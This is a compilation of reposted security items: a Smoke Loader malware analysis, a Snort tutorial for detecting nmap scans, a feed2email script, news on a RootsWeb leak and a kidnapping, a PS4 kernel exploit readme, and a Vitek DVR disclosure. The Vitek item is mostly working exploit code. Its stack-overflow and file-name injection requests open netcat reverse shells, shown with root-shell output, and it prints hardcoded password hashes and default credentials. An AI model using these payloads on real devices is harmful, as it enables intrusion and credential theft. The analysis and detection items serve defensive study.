(C2) server to download the arbitrary payload for the exploit kit subscriber. This diagram represents how Smoke loader goes from initial execution to full presence on the system. Figure 1: Process Overview Technical Analysis Delivery Nullsoft is an open source script-based tool for building installers on windows. It is easy to use this wrapper to quickly setup the first stage of the Smoke Loader malware. For this version of Smoke Loader the installer essentially just dropped and executed the first stage of the malware in the %TEMP% folder, which comes in the form of a malicious DLL called fiberboards.dll and a packed file called Lexigraphy.cab. The fiberboards.dll binary will then unpack Lexigraphy.cab, load the necessary libraries and APIs, and launch another copy of the original malware suspended in memory. The now unpacked stage two is mapped into the memory of the new process and is ready to be executed. The fiberboards.dll file then passes execution onto stage two and exits. Injection Junction Stage two is where the fun begins for this sample. This portion of the code contains heavily obfuscated code flow that self-modifies as it is executing. This type of anti-analysis technique can make it very difficult to perform static analysis on the binary. Function calls often go several levels deep and then a new address is pushed onto the stack just before the return in order to re-direct the flow of the code to an entirely different function, never to return. Since this is done dynamically, tools such as IDA are unable to follow the code flow forcing the analyst to step through each function call. Bypassing these type of packers can be time consuming and problematic, especially if there are any kind of anti-debugging tricks that make finding the end of the unpacker difficult. Stepping over a function that seemed unimportant can often result in the malware executing beyond what you expected. Working through this packer, we determined where the next stage was unpacked in memory. This allowed us to set a breakpoint on that location and dump the unpacked malicious code. Once the packer has been bypassed we are now able to more clearly see what the malware is going to do. Crossroads Once the code is unpacked, the final version of the malware is visible to us. There are two paths available depending on the current status of the execution flow. Both paths also share code used to set up required library functions and anti-analysis defenses. Smoke Loader uses a custom hashing algorithm in order to compare various process, libraries, and window names through the program. Here is the algorithm used by this version of Smoke Loader: Figure 2: Hashing Algorithm This allows for hardcoded values to be used by the malware without revealing what names they are actually looking for. Figure 3: Loading Libraries These two hardcoded values (0x421E4440 and 0x44194744) are the hashed representation of the file names ntdll.dll and kernel32.dll respectively. Each loaded library name is hashed until the values match and the address of that library is recorded. Smoke Loader also dynamically loads each API call using this same hashing algorithm. All of this obfuscation further increases the time to statically analyze functions and determine functionality. Once the API calls addresses are stored, Smoke Loader executes two threads that protect the malicious process from active analysis. These threads hash process names running on the system and the names of active windows and compare them against a hardcoded list of hashes that should be terminated. Using the hashing algorithm makes it difficult to determine exactly which analysis tools will be terminated. In order to attempt to determine which tools will be terminated, we reproduced the hashing algorithm in C++ to be able to run different names through the algorithm. Here is a link to the code, which can take a file and hash all the names. While it is difficult to have a full list of window and process names for all things the authors might have wished to detect, the following list are some of the values we were able to determine the binary was looking for and would terminate: Ollydbg Process Hacker Procmon Utilizing the implemented algorithm also made it easier to determine which libraries were going to be loaded, making static analysis of functions quicker. The threads run in a constant loop looking for any of the hardcoded hashes and window class names to be terminated. The final bit of anti-analysis is checking to see if the malware is running on a virtual machine. This is performed by querying the following registry key: HKLMSystemCurrentControlSetServicesDiskEnum Four strings are decoded and checked to see if they are contained in the result. If and of the following strings are detected the malware continuously calls the sleep function: qemu virtual vmware xen ffffcce24 In order to prepare for the next stage, a hash is generated from hardcoded data within the sample and used as the name of a file mapping created with the API CreateFileMappingA: 63CA4449C7E27B984F81F498FCDFC938 This file mapping contains the full path to where the malware is residing on the system. At this point, the malware is ready to move to its final destination: explorer.exe. A new explorer.exe is launched in a suspended state, the code is hollowed out, and the malware copies itself into its new home. Execution is then resumed and transferred to the new process. Let’s Explore Much of the same setup functionality discussed above is re-executed in the new explorer process, ensuring that all the libraries are loaded and the anti-analysis threads are executing. A check is performed to see if the parent process is explorer and if it is, the next phase of the malware executes. The same hash is created as above and the file mapping opened so this stage of the malware can retrieve the location of the original malware. The previous stage will wait until this handle is closed before exiting. Next, Smoke Loader obtains the user agent string for the current version of Internet Explorer installed on the system. In order to verify that the system has a connection to the Internet, it will attempt to contact hxxp://www.bing.com and will continue attempting to connect to this address every sixty seconds until it gets a response. Before moving the original malicious executable to its new location, the computer name and the volume information are retrieved from the system and hashed to serve as a mutex on the infected system. This ensures that there aren’t multiple infections on the current machine while it is being moved to the new location. Smoke Loader then searches through the following registry key looking for any subkeys that have the values HelpLink and URLInfoAbout: HKLMSoftwareMicrosoftWindowsCurrentVersionUninstall Some of this information will be used to look less suspicious when installing persistence on the system further down. An eight character name is generated based on the last eight characters of the unique ID generated above and is used as the future name of the malware. The first 8 characters of the ID are used to generate the random folder name it will be contained in. Here is a visual demonstration of this process: Figure 4: Name Generation Now that the folder and malware name have been generated, the new path for malware is put together: %APPDATA%Microsoftbteurgsdugivagdt.exe The directory is created according to the above location, the malware is copied from its original dropped location to the new malware path, and the original copy is deleted. It will also attempt to delete ugivagdt.exe:Zone.Identifier in the newly created folder. In order to further blend in with the system the folder and the malware file have their attributes changed to system and hidden and both are timestomped using the timestamps from advapi32.dll in the system folder. In order to set up persistence, Smoke Loader uses information taken from the uninstall registry key above and uses it to create a value in the following key: SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun In the case of my analysis machine, Process Hacker 2 was chosen as the target to hide on the system. Figure 5: Persistence This essentially uses policy settings to specify startup programs for the user. Once the persistence is in place, a thread is created that repeatedly checks for the existence of this key. If the key is deleted it will re-create the key to maintain persistence. With the malware fully installed on the system, a thread is launched that performs the remainder of the tasks for Smoke Loader. Are we there yet? This thread contains the functionality for handling whatever type of payload the exploit kit is currently serving up. At the time of this writing, the C2 server was no longer active. Fake traffic is also generated in this thread using the URL taken from the Uninstall key above (hxxp://sourceforge.net/projects/processhacker/support for example on my analysis system). This is done on a random timer and several times in order to look legitimate on the system. Finally, once it has done its best to look legitimate, the C2 server is contacted. From here, additional payloads can be downloaded and executed or injected directly into the process. Additional C2 servers can also be added to the list in order to maintain the ability of Smoke Loader to contact its controllers. Conclusion Exploit kits can deliver potentially thousands of samples across the Internet on a daily basis. Because of the sheer number of eyes that may see their samples, they are often very difficult to analyze. Heavy code obfuscation, anti-analysis, anti-virtualization, and multiple layers of injection and hollowing are common fare for this type of malware. This class of malware can often have new and interesting ways of evading detection in order to retrieve the final payload from another location, which make them worth analyzing in detail. By listing IOC’s and detailing the tactics and techniques used, networks can be better protected from these malicious threats. Indicators Indicator Type Context http://hellobro.bit Domain Command and Control Server 4082bf938715c3d4ca639e47313f991b MD5 Smoke Loader 88048f15b3206de1efd6147bac585be17c84caafd9ac2a0392d4886ce5a148f5 SHA256 Smoke Loader 63CA4449C7E27B984F81F498FCDFC938 File Mapping Source: https://www.cybrary.it/channelcontent/smoke-and-mirrors/
  17. Today we are going to discuss how to Detect NMAP scan using Snort but before moving ahead kindly read our privious both articles releted to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network. Basically in this article we are testing Snort against NMAP various scan which will help network security analyst to setup snort rule in such a way so that they become aware of any kind of NMAP scanning. Requirement Attacker: Kali Linux (NMAP Scan) Target: Ubuntu (Snort as IDS) Optional: Wireshark (we have added it in our tutorial so that we can clearly confirm all incoming and outgoing packet of network) Let’s Begins!! Identify NMAP Ping Scan As we know any attacker will start attack by identifying host status by sending ICMP packet using ping scan. Therefore be smart and add a rule in snort which will analyst NMAP Ping scan when someone try to scan your network for identifying live host of network. Execute given below command in ubuntu’s terminal to open snort local rule file in text editor. sudo gedit /etc/snort/rules/local.rules Now add given below line which will capture the incoming traffic coming on 192.168.1.105(ubuntu IP) network for ICMP protocol. alert icmp any any -> 192.168.1.105 any (msg: “NMAP ping sweep Scan “; dsize:0;sid:10000004; rev: 1;) Turn on IDS mode of snort by executing given below command in terminal: sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0 Now using attacking machine execute given below command to identify status of target maching i.e. host is UP or Down. nmap -sP 192.168.1.105 –disable-arp-ping If you will execute above command without parameter “disable arp-ping” then will work as default ping sweep scan which will send arp packets inspite of sending ICMP on targets network and may be snort not able to capture NMAP Ping scan in that sinario, therefore we had use parameter “disable arp-ping” in above command. As I had declaimed above why we are involving wireshark in this tutorial so that you can clearly see the packet sends form attacker network to targets network. Hence in given below image you can notice ICMP request packet as well as ICMP reply packets both are part of network traffic. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Ping Sweep scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP TCP Scan Now in order to connect with target network, attacker may go with networking enumeration either using TCP Protocol or UDP protocol. Let assume attacker may choose TCP scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.105 22 (msg: “NMAP TCP Scan”; sid:10000005; rev:2; ) Above rule is only applicable for port 22 so if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for TCP scan on port 22. nmap -sT -p22 192.168.1.105 From given below image you can observe wireshark has captured TCP packets from 192.168.1.104 to 192.168.1.105 Here you can confirm that our snort is absolutely working when attacker is scanning port 22 using nmap TCP scan and it is showing attacker’s IP from where traffic is coming on port 22. Hence you can block this IP to protect your network from further scanning. Identify NMAP XMAS Scan As we know that TCP communication follows three way handshake to established TCP connection with target machine but sometimes instead of using SYN, SYN/ACK,ACK flag attacker choose XMAS scan to connect with target by sending data packets through Fin, PSH & URG flags. Let assume attacker may choose XMAS scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.105 22 (msg:”Nmap XMAS Tree Scan”; flags:FPU; sid:1000006; rev:1;) Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from Fin, PSH & URG flags .So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for XMAS scan on port 22. nmap -sX -p22 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN, PSH, URG flags. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP XMAP scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP FIN Scan Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose FIN scan to connect with target by sending data packets through Fin flags only. Let assume attacker may choose FIN scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.1045 22 (msg:”Nmap FIN Scan”; flags:F; sid:1000008; rev:1;) Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from Fin Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for FIN scan on port 22. nmap -sF -p22 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using FIN flags. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP FIN scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP NULL Scan Instead of using SYN, SYN/ACK and ACK flag to established TCP connection with target machine may attacker choose NULL scan to connect with target by sending data packets through NONE flags only. Let assume attacker may choose NULL scanning for network enumeration then in that situation we can apply following rule in snort local rule file. alert tcp any any -> 192.168.1.105 22 (msg:”Nmap NULL Scan”; flags:0; sid:1000009; rev:1;) Again above rule is only applicable for port 22 which will listen for incoming traffic when packets come from NONE Flags. So if you want to scan any other port then replace 22 from the port you want to scan else you can also use “any” to analysis all ports. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for NULL scan on port 22. nmap -sN -p22 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send using NONE flags. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP Null scan. Hence you can block attacker’s IP to protect your network from further scanning. Identify NMAP UDP Scan In order to Identify open UDP port and running services attacker may chose NMAP UDP scan to establish connection with target machine for network enumeration then in that situation we can apply following rule in snort local rule file. alert UDP any any -> 192.168.1.105 any(msg:”Nmap UDPScan”; sid:1000010; rev:1;) Again above rule is applicable for every UDP port which will listen for incoming traffic when packets is coming over any UDP port, so if you want to capture traffic for any particular UDP port then replace “any” from that specific port number as done above. Enable NIDS mode of snort as done above. Now again using attacker machine execute the given below command for NULL scan on port 22. nmap -sU -p68 192.168.1.105 From given below image you can observe that wireshark is showing 2 packets from attacker machine to target machine has been send over UDP Port. Come back to over your target machine where snort is capturing all in coming traffic here your will observe that it is generating alert for NMAP UDP scan. Hence you can block attacker’s IP to protect your network from further scanning. Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here Source: http://www.hackingarticles.in/detect-nmap-scan-using-snort/
  18. feed2email Send RSS/Atom feeds to e-mail requirements.txt feedparser==5.2.1 feed2email.py #!/usr/bin/env python3 # vim: set ai et ts=4 sw=4: # feed2email.py # (c) Aleksander Alekseev 2016-2017 # http://eax.me/ import feedparser from smtplib import SMTP # from smtplib import SMTP_SSL as SMTP from email.mime.text import MIMEText from contextlib import contextmanager import signal import getpass import hashlib import time import sys import re server = 'smtp.yandex.ru' port = 587 # 25 login = "YOUR_SENDER_LOGIN" from_addr = "NEWS <YOUR_SENDER_LOGIN@yandex.ru>" receiver = "YOUR_EMAIL" processed_urls_fname = "processed-urls.txt" feed_list_fname = "feed-list.txt" # change to True before first run or you will receive A LOT of emails # then change back to False fake_send = False sleep_time = 60*5 # seconds net_timeout = 20 # seconds smtp_retry_time = 30 # seconds smtp_retries_num = 5 # >>> import hashlib # >>> hashlib.sha1(b"qwerty").hexdigest() # 'b1b3773a05c0ed0176787a4f1574ff0075f7521e' pwhash = 'YOUR_PASSWORD_SHA1_HASH' # FUNCS class TimeoutException(Exception): pass @contextmanager def timeout_sec(seconds): def signal_handler(signum, frame): raise TimeoutException(Exception("Timed out!")) signal.signal(signal.SIGALRM, signal_handler) signal.alarm(seconds) try: yield finally: signal.alarm(0) def file_to_list(fname): rslt = [] with open(fname, "r") as f: rslt = [x for x in f.read().split("\n") if x.strip() != "" ] return rslt # MAIN password = getpass.getpass("SMTP Password: ") if hashlib.sha1(bytearray(password, 'utf-8')).hexdigest() != pwhash: print("Invalid password", file = sys.stderr) sys.exit(1) while True: feed_list = file_to_list(feed_list_fname) # filter comments feed_list = [ x for x in feed_list if not re.match("(?i)\s*#", x) ] keep_urls = 1000*len(feed_list) processed_urls = [] try: processed_urls = file_to_list(processed_urls_fname) except FileNotFoundError: pass print("Processing {} feeds...".format(len(feed_list))) for feed in feed_list: print(feed) f = None try: with timeout_sec(net_timeout): f = feedparser.parse(feed) except TimeoutException: print("ERROR: Timeout!") continue feed_title = f['feed'].get('title', '(NO TITLE)') feed_link = f['feed'].get('link', '(NO LINK)') for entry in f['entries']: if entry['link'] in processed_urls: continue subject = "{title} | {feed_title} ({feed_link})".format( title = entry.get('title', '(NO TITLE'), feed_title = feed_title, feed_link = feed_link ) print(subject) summary = entry.get('summary', '(NO SUMMARY)') body = "{summary}\n\n{link}\n\nSource feed: {feed}".format( summary = summary[:256], link = entry['link'], feed = feed ) print(body) print("-------") msg = MIMEText(body, 'plain') msg['Subject'] = subject msg['From'] = from_addr msg['To'] = receiver if not fake_send: for attempt in range(1, smtp_retries_num+1): try: with timeout_sec(net_timeout), SMTP(server, port) as conn: conn.starttls() conn.login(login, password) conn.sendmail(from_addr, [receiver], msg.as_string()) break except Exception as exc: print(("Failed to send email {}/{} - {}, " + "retrying in {} seconds").format( attempt, smtp_retries_num, exc, smtp_retry_time ) ) time.sleep(smtp_retry_time) processed_urls = [ entry['link'] ] + processed_urls with open(processed_urls_fname, "w") as urls_file: urls_file.write("\n".join(processed_urls[:keep_urls])) print("Sleeping {} seconds...".format(sleep_time)) time.sleep(sleep_time) Download: feed2email-master.zip Source: https://github.com/afiskon/feed2email
  19. In 2015, artist Ai Weiwei was bugged in his home, presumably by government actors. This situation raised our awareness on the lack of research in our community about operating and detecting spying microphones. Our biggest concern was that most of the knowledge came from fictional movies. Therefore, we performed a deep study on the state-of-the-art of microphone bugs, their characteristics, features and pitfalls. It included real life experiments trying to bug ourselves and trying to detect the hidden mics. Given the lack of open detection tools, we developed a free software SDR-based program, called Salamandra, to detect and locate hidden microphones in a room. After more than 120 experiments we concluded that placing mics correctly and listening is not an easy task, but it has a huge payoff when it works. Also, most mics can be detected easily with the correct tools (with some exceptions on GSM mics). In our experiments the average time to locate the mics in a room was 15 minutes. Locating mics is the novel feature of Salamandra, which is released to the public with this work. We hope that our study raises awareness on the possibility of being bugged by a powerful actor and the countermeasure tools available for our protection. Video: https://media.ccc.de/v/34c3-8735-spy_vs_spy_a_modern_study_of_microphone_bugs_operation_and_detection#video&t=0
  20. Leaky RootsWeb Server Exposes Some Ancestry.com User Data Ancestry.com said it closed portions of its community-driven genealogy site RootsWeb as it investigated a leaky server that exposed 300,000 passwords, email addresses and usernames to the public internet. In a statement issued over the weekend, Chief Information Security Officer of Ancestry.com Tony Blackham said a file containing the user data was publicly exposed on a RootsWeb server. On Wednesday, Ancestry.com told Threatpost it believed the data was exposed on November 2015. The data resided on RootsWeb’s infrastructure, and is not linked to Ancestry.com’s site and services. Ancestry.com said RootsWeb has “millions” of members who use the site to share family trees, post user-contributed databases and host thousands of messaging boards. The company said RootsWeb doesn’t host sensitive information such as credit card data or social security numbers. It added, there are no indications data exposed to the public internet has been accessed by a malicious third party. The company declined to specify how and why the data was stored insecurely on the server. The exposure of data was first brought to Ancestry.com’s attention on Dec. 20 when Troy Hunt, who runs the data breach repository HaveIBeenPwned.com, reported to the company the existence of the file on RootsWeb’s server. According to a tweet by Hunt the publicly exposed data contained plain text passwords. The company said as it investigates some of RootsWeb’s services would be taken offline. On Wednesday, visitors were greeted with the message: Customers were told as a result of some sections of RootsWeb being taken offline it “may not be able to salvage everything” as Ancestry.com works to resolve this issue and “improve the site’s infrastructure.” Ancestry.com declined to say how long the site would have limited functionality. However, in a comment section of Ancestry.com a company representative told a customer: “We do not have a specific timeline at this point. We hope it will take no more than a few weeks to resolve these issues.” Blackham said 55,000 impacted accounts will be “locked” and users trying to access them will be forced to create a new password. Affected users will also be notified by email of the user data exposure. Over the past several days RootsWeb users have peppered Blackham’s security update blog post with passionate requests to preserve user data and return functionality. Ancestry.com joins a long list of companies that have fallen victim to a leaky server that has inadvertently exposed sensitive company information to the public internet in 2017. Via threatpost.com
  21. # PS4 4.05 Kernel Exploit --- ## Summary In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival. You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days). ## Patches Included The following patches are made by default in the kernel ROP chain: 1) Disable kernel write protection 2) Allow RWX (read-write-execute) memory mapping 3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process 4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode 5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation. ## Notes - This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel. - I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads. - A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel. - An SDK is not provided in this release, however a barebones one to get started with may be released at a later date. - I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox. ## Contributors I was not alone in this exploit's development, and would like to thank those who helped me along the way below. - [qwertyoruiopz](https://twitter.com/qwertyoruiopz) - [Flatz](https://twitter.com/flat_z) - [CTurt](https://twitter.com/CTurtE) - Anonymous E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip Source: exploit-db.com
  22. Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukranian capital of Kiev. According to Ukraine-based web publication Strana, Lerner, 40-year-old citizen of Russia, was kidnapped on December 26 when he was leaving his office in the center of town (located on the Stepan Bandera Avenue). Unknown kidnappers in dark clothes and balaclavas dragged Lerner in their black Mercedes-Benz Vito brand (state number AA 2063 MT) car and drove away in an unknown direction. The information comes from an anonymous source in Ukrainian law enforcement agencies, though multiple investigations are currently underway to find out why and by whom Lerner was kidnapped. Lerner is a recognized IT specialist in Ukraine who led a number of startups related to blockchain technology development and mining operations. Lerner is also the managing director of EXMO, a major UK-based cryptocurrency exchange founded in 2013 and well-known with Russians for accepting ruble payments. Law enforcers in Kiev have begun an investigation and are currently conducting search operation, working out all possible leads in the case which is described as the kidnapping. EXMO's representatives confirmed media reports in a statement to a local crypto journal BitNovosti and appealed for any information that could lead to the finding of Lerner. The company representatives also assured its customers that EXMO operations were not affected by the incident and that Lerner did not have direct access to any cryptocurrency account or other personal data. Lerner case has been considered to be yet another case involving a Russian national with cryptocurrency background. In July this year, Alexander Vinnik, a 38-year-old Russian citizen and operator of cryptocurrency exchange BTC-e, was detained in Northern Greece at the request of US law enforcement authorities. The Greece court in October also ruled to extradite Vinnik to the United States. The US authorities accused Vinnik of crimes related to the hack of Mt. Gox, which was shut down in 2014 following a massive series of mysterious robberies, which totaled at least $375 million in Bitcoin. Via thehackernews.com
  23. Vitek suffers from remote code execution and information disclosure vulnerabilities. [STX] Subject: Vitek RCE and Information Disclosure (and possible other OEM) Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 22, 2017 Full Disclosure: 0-day heap: Executable + Non-ASLR stack: Executable + ASLR -[Manufacture Logo]- _ _ _ _ _ _ _ _ _ _ _ _ \ _ _ _ _ _ ___ / /__/ \ |_/ / __ / - _ ___ / / / / / / _ _ _ _/ / / \_/ \_ ______ ___________\___\__________________ -[OEM (found in the code)]- Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R Thrive Wisecon Sanyo Inodic CBC Elbex Y3K KTNC -[Stack Overflow RCE]- [Reverse netcat shell] $ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81 [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:36356. pwd /opt/fw whoami root exit $ Note: 1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20 2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4] 3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0 H1: VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6 .rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001CD138 SUB R3, R11, #0x74 .text:001CD13C MOV R0, R3 .text:001CD140 BL system H4: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R .rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:00114AC8 SUB R3, R11, #0x74 .text:00114ACC MOV R0, R3 .text:00114AD0 BL system N1: VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6 .rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0 .text:001E9F0C SUB R3, R11, #0x74 .text:001E9F10 MOV R0, R3 .text:001E9F14 BL system -[PHP RCE]- Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted) [Reverse netcat shell (forking)] $ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST 200 OK [...] > ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody> [...] [Listener] $ ncat -vlp 31337 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF Ncat: Listening on :::31337 Ncat: Listening on 0.0.0.0:31337 Ncat: Connection from 192.168.57.20. Ncat: Connection from 192.168.57.20:52726. pwd /opt/www/htdocs/system whoami nobody ls -l /mnt/usb2/ total 4 drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr -rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}|| exit $ -[Login / Password Disclosure]- curl -v "http://192.168.57.20:80/menu.env" | hexdump -C [binary config, login and password can be found for admin login and all connected cameras] Admin l/p [...] 00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................| 00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......| 000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12| 00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............| 00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| Cameras l/p [...] 00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................| 00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........| 00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........| 00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................| 00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root| 00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass| 00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| -[Hardcode l/p]- FTP: TCP/10021 TELNET: TCP/10023 /etc/passwd root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh -[Korean hardcoded DNS]- $ cat /etc/resolv.conf nameserver 168.126.63.1 nameserver 0.0.0.0 nameserver 0.0.0.0 $ $ nslookup 168.126.63.1 1.63.126.168.in-addr.arpa name = kns.kornet.net. $ nslookup 168.126.63.2 2.63.126.168.in-addr.arpa name = kns2.kornet.net. -[Other Information Disclosure]- curl -v "http://192.168.57.20:80/webviewer/netinfo.dat" 192,168,57,20 192,168,2,100 00:0A:2F:XX:XX:XX 00:0A:2F:YY:YY:YY 255.255.255.0 192.168.57.1 -[MAC Address Details]- Company: Artnix Inc. Address: Seoul 137-819, KOREA, REPUBLIC OF Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF Type: IEEE MA-L curl -v "http://192.168.57.20:80/webviewer/gw.dat" Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0 curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0" Change GUI Language to English [... and more] [ETX] Source: https://packetstormsecurity.com/files/145534/Vitek-Remote-Code-Execution-Information-Disclosure.html
